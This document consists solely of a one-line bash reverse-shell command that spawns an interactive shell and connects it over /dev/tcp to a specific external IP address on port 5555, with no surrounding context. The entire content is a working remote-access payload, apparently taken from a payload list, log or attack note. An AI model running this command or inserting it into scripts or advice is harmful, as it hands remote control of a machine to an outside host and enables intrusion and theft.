bash -c "/bin/sh -i >& /dev/tcp/39.106.73.11/5555 0>&1"